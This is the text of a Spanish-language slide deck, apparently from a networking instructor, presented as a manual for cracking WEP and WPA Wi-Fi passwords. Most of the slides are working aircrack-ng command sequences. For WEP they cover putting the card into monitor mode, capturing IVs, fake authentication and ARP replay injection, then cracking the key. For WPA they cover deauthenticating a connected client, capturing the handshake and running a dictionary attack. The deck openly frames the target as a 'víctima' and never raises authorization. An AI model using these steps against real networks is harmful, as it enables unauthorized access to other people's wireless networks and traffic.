30
Paulo Colomés F. Docente Universidad Tecnológica de Chile Inacap Instructor CCNA CCAI Cisco Networking Academy www.redescisco.net

Manual para romper contraseñas WEP y WPA

Embed Size (px)

DESCRIPTION

Algunos comandos paso a paso para obtener contraseñas WEP y WPA.

Citation preview

Page 1: Manual para romper contraseñas WEP y WPA

Paulo Colomés F.

Docente Universidad Tecnológica de Chile Inacap

Instructor CCNA CCAI Cisco Networking Academy

www.redescisco.net

Page 2: Manual para romper contraseñas WEP y WPA

Objetivos

Page 3: Manual para romper contraseñas WEP y WPA

¿Seguridad en redes inalámbricas?

Page 4: Manual para romper contraseñas WEP y WPA

¿Seguridad en redes inalámbricas?

WPA2-AESWPA2-TKIPWPA-PSKWEP 128WEP 64

MAC AuthSin Seguridad

Page 5: Manual para romper contraseñas WEP y WPA

¿Seguridad en redes inalámbricas?

WPA2-AESWPA2-TKIPWPA-PSKWEP 128WEP 64

MAC AuthSin Seguridad

AQUÍ ATACAMO

S!

Page 6: Manual para romper contraseñas WEP y WPA

Algo de lenguaje…

-- WEP = Wired Equivalent Privacy-- WPA (No WAP) = WiFi Protected Access-- El verbo “encriptar” en español no existe, ni menos “desencriptar” ni ningún derivado.

El término correcto es “cifrar”y

“descifrar”

Page 7: Manual para romper contraseñas WEP y WPA

Nuestro Kit de Herramientas•Tarjeta inalámbrica decente•Sistema operativo Unix•Drivers parchados para inyectar tráfico en la red•Airodump-ng•Aireplay-ng•Wesside-ng (Opcional)•Aircrack-ng

•Opcionales:•Kismet•Hydra•Airsniff•….otros

Page 8: Manual para romper contraseñas WEP y WPA

Sistema Operativo Unix

• Backtrack 4• Wifiway• Wifislax

O algunos Linux previamente especializados en esta materia:

•FreeBSD•OpenBSD•NetBSD•Solaris•Mac OSX•Linux

Page 9: Manual para romper contraseñas WEP y WPA

Ahora… a lo que vinimos

Page 10: Manual para romper contraseñas WEP y WPA

Pasos para obtener una contraseña WEP

1. Configurar la tarjeta de red en modo monitor (promisc)2. Escanear el aire en búsqueda de una red inalámbrica

interesante3. Identificar una víctima inocente e indefensa4. Comenzar a obtener tramas que contengan información

WEP y almacenarlas en un archivo.5. Si la víctima se resiste, inyectarle tráfico para generar

respuestas vulnerables6. Crackear la contraseña WEP

7. Conectarse y ser feliz

Page 11: Manual para romper contraseñas WEP y WPA

¿Por qué es posible romper claves WEP?

Page 12: Manual para romper contraseñas WEP y WPA

1. WEP se basa en el algoritmo criptográfico RC4 el cual es conocido por sus vulnerabilidades.

2. WEP envía parte de su tráfico sin cifrar lo que permite capturar IVs (Vectores de Inicialización)

Page 13: Manual para romper contraseñas WEP y WPA

Pasos para obtener una contraseña WEP

1. Configurar la tarjeta de red en modo monitor (promisc)

root@hacker:~# airmon-ng start wlan0root@hacker:~# iwconfig

Page 14: Manual para romper contraseñas WEP y WPA

Pasos para obtener una contraseña WEP

2. Escanear el aire en búsqueda de una víctima en la interfaz monitor.

root@hacker:~# airodump-ng mon0

Page 15: Manual para romper contraseñas WEP y WPA
Page 16: Manual para romper contraseñas WEP y WPA

Pasos para obtener una contraseña WEP

3. Una vez seleccionada la víctima capturamos los paquetes de tráfico que contengan IV’s válidos.

root@hacker:~# airodump-ng –c 1 –w intento1 - -bssid 00:11:22:33:44:55 mon0

Donde: -c = Canal donde se encuentra la víctima (del 1 al 14)-w = Nombre con el que se guardará el archivo de capturas (.cap)- - bssid = Dirección MAC del Access Point que queremos crackear

Page 17: Manual para romper contraseñas WEP y WPA
Page 18: Manual para romper contraseñas WEP y WPA

Pasos para obtener una contraseña WEP

4. Esperar que se junten al menos 20.000 IV’s (Indicados en la columna #Data). Como esto puede tomarnos mucho tiempo, sobre todo si no hay tráfico entre algún cliente válido y el AP, debemos entonces acelerar ese proceso. En un nuevo terminal ejecutar:

root@hacker:~# aireplay-ng -1 0 –a 00:11:22:33:44:55 -e Hackme mon0

Donde: -a = Dirección MAC del Access Point que queremos crackear.-e = Nombre de la red (SSID) que queremos creackear.

Page 19: Manual para romper contraseñas WEP y WPA

Pasos para obtener una contraseña WEP

Se debe obtener un mensaje “Association Successful =) (AID: 1)”

Page 20: Manual para romper contraseñas WEP y WPA
Page 21: Manual para romper contraseñas WEP y WPA

Pasos para obtener una contraseña WEP

5. Inyectar tráfico ARP para acelerar la respuesta (ARP Replies) desde el Access Point que contenga IV Válidos para poder crackear.

root@hacker:~# aireplay-ng -3 -b 00:11:22:33:44:55 mon0

Page 22: Manual para romper contraseñas WEP y WPA
Page 23: Manual para romper contraseñas WEP y WPA

Pasos para obtener una contraseña WEP

Esperar que los IV’s del Airodump iniciado en el paso N° 3 lleguen a los 100.000, aunque con 20.000 es posible romper claves en ciertos casos.

Page 24: Manual para romper contraseñas WEP y WPA

Pasos para obtener una contraseña WEP

6. Cuando se tengan suficientes IV’s se puede lanzar el programa AirCrack sobre el archivo .cap almacenado anteriormente.

root@hacker:~# aircrack intento1-01.cap

Page 25: Manual para romper contraseñas WEP y WPA
Page 26: Manual para romper contraseñas WEP y WPA

Pasos para obtener una contraseña WEP

Page 27: Manual para romper contraseñas WEP y WPA

Pasos para obtener una contraseña WEP

6. Una vez que se tenga la clave de la red Wireless, solo queda conectarse mediante un gestor gráfico o mediante comandos.

iwconfig wlan0 mode managed iwconfig wlan0 key s:admin iwconfig wlan0 essid “Hackme” dhclient wlan0 ping www.google.cl

Page 28: Manual para romper contraseñas WEP y WPA
Page 29: Manual para romper contraseñas WEP y WPA

¿Y las claves WPA/WPA2?

Aunque WPA se basa en el mismo algoritmo que WEP (RC4), esta es más segura por ahora para redes inalámbricas y no es posible directamente crackear una contraseña WPA usando el mismo método que WEP. Lo que sí se puede hacer es lanzar un ataque de diccionario (no de fuerza bruta) contra esa red. Si la contraseña es básica, la podemos sacar.

Esto solo funciona si es que hay algún cliente ya conectado a la red. Atacar WPA consiste en desconectar al cliente y capturar los handshakes de autenticación.

Page 30: Manual para romper contraseñas WEP y WPA

¿Y las claves WPA/WPA2?

1. Capturar Handshakes# airodump-ng –c 1 –w intento1 - -bssid 00:11:22:33:44:55 mon02. Forzar a un cliente a reconectarse a la red # aireplay -0 5 -a 00:11:22:33:44:55 -c <MAC_CLIENTE> mon0 3. Una vez que se tengan los handshakes, correrle un ataque dediccionario.# aircrack –a 2 –b 00:11:22:33:44:55 –w /ruta/al/wordlist.txt

Donde - -bssid, -a y –b es la MAC de del Access Point víctima